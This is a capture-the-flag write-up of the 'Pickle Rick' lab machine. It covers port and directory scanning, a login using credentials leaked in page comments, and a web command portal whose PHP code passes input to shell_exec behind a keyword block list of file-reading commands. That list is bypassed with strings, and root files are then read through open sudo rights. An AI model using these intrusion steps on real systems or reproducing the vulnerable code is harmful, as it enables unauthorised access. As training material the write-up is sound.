Reconnaissance
Port Scan
First we make a port scan to see what ports are open with:
nmap -p- --open -sS --min-rate 5000 -n -vvv -Pn 10.66.167.244 -oG allPorts
-p-: Scan all 65535 ports--open: Show only open ports-sS: TCP SYN scan (stealth scan)--min-rate 5000: Send packets no slower than 5000 per second-n: No DNS resolution-vvv: Very verbose output-Pn: Skip host discovery (treat host as online)-oG allPorts: Save results in grepable format to file named “allPorts”
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
And now we scan the version of the service of each port open and we throw some recon scripts:
nmap -p22,80 --open -sCV 10.66.167.244 -oN target
-p22,80: Scan specific ports 22 and 80--open: Show only open ports-sC: Run default NSE scripts for reconnaissance-sV: Detect service versions on open ports-oN target: Save output in normal format to file named “target”
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dd:6c:c5:1c:c9:f3:ac:7e:b1:3e:cb:32:ec:36:82:3d (RSA)
| 256 a9:93:14:67:cb:0f:20:ff:45:43:d9:bd:54:2d:a9:fa (ECDSA)
|_ 256 8a:f7:85:4e:51:09:78:c9:3d:c1:79:b5:49:0f:25:67 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web scan
We make a directory and files discovery with gbuster
gobuster dir -u <http://10.66.167.244/> -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,log,db,bck -t 200 2>/dev/null
dir: Directory/file enumeration mode-u: Target URL to scan-w: Path to wordlist file for brute-forcing-x: File extensions to append to each word in wordlist-t: Number of concurrent threads to use2>/dev/null: Redirect error messages to null device (suppress errors)
login.php (Status: 200) [Size: 882]
assets (Status: 301) [Size: 315] [--> <http://10.66.167.244/assets/>]
portal.php (Status: 302) [Size: 0] [--> /login.php]
robots.txt (Status: 200) [Size: 17]
Lets see what is inside each file or directory:
login.php- A simple login page without anything in the sourcecode
assets- We see the files at the web listed, but nothing interesting
portal.php→ redirects to the login pagerobots.txt- We only see the following content
Wubbalubbadubdub
- We only see the following content
Web Source Code
At the source code we find something really interesting:
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
And also the web title: Rick is s4per cool give us some clues.
So, with all this info, we will try to login as the user RickRul3s testing with the password Rick is s4per cool and Wubbalubbadubdub
And there we go, we are logged in.
First Ingredient
We see that the only page of the web we have access (the rest are restricted for the real rick) is a command page where we can execute commands at the system.
But don’t get too excited, all the usefull commands are banned.
With the command ls we can see the following:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
We can’t use cat to read the files, but we can use the command strings which basically is the same.
So we can read the first ingredient with that command.
Second Ingredient
If we read the file portal.php and intercept the request with BurpSuite, we can see what is the function that is banning us from executing commnads:
<?php
function contains($str, array $arr)
{
foreach($arr as $a) {
if (stripos($str,$a) !== false) return true;
}
return false;
}
// Cant use cat
$cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
if(isset($_POST["command"])) {
if(contains($_POST["command"], $cmds)) {
echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
} else {
$output = shell_exec($_POST["command"]);
echo "</br><pre>$output</pre>";
}
}
?>
This is cool to see, but not enough.
Bellow this file, we see a base64 string as a HTML comment:
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
Which we can decrypt at https://gchq.github.io/CyberChef/
But affter multiple base64 decrypts, we get to the message rabbit hole 🙁
Now, we reed the clue.txt and it tells us to search at all the system. To do this, we will make ls -la ../ to navigate through the directories and see files.
After searching, we find the second ingredient at the /home/rick/ directory and we can read it with:
strings ../../../home/rick/second*
Last ingredient
Last but not least, we will find the third ingredient.
If we execute sudo -l we see this amazing output:
User www-data may run the following commands on ip-10-66-180-22:
(ALL) NOPASSWD: ALL
So basically, we can execute anything as root.
We search for the flag at the root directory:
sudo ls -la ../../../root/
And we read it:
sudo strings ../../../root/3rd.txt
And there we go, the 3 ingredients.
Conclusion
This Pickle Rick machine demonstrated fundamental web exploitation and privilege escalation techniques. The challenge began with reconnaissance using nmap and gobuster, revealing critical information through source code comments and the robots.txt file. By leveraging basic command injection vulnerabilities in the web portal and identifying weak restrictions on banned commands, we successfully retrieved all three ingredients. The final privilege escalation was straightforward due to unrestricted sudo permissions for the www-data user, highlighting the importance of proper access controls. Overall, this CTF provided excellent practice in web enumeration, command injection bypass techniques, and understanding Linux privilege escalation through misconfigured sudo permissions.
Video Walkthrough
Here you have a spanish video of my YouTube channel with the walkthrough of this machine: